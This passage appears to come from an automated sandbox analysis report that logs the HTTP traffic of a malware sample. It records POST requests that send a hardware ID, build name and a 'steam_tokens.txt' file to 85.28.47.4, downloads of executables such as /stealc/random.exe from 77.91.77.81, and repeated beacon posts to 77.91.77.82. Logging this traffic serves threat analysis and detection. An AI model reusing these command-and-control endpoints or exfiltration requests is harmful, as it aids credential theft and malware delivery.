name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="file"------KEGIDHJKKJDGCBGCGIJK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEGHJEGHJKFIEBFHJKKHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------GIEGHJEGHJKFIEBFHJKKContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------GIEGHJEGHJKFIEBFHJKKContent-Disposition: form-data; name="message"jbdtaijovg------GIEGHJEGHJKFIEBFHJKK--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000006001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGHHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 30 30 34 37 42 42 42 30 42 38 33 39 34 36 30 39 38 34 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 2d 2d 0d 0a Data Ascii: ------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="hwid"F10047BBB0B83946098432------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="build"default------JEGHJDGIJECGDHJJECGH--
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
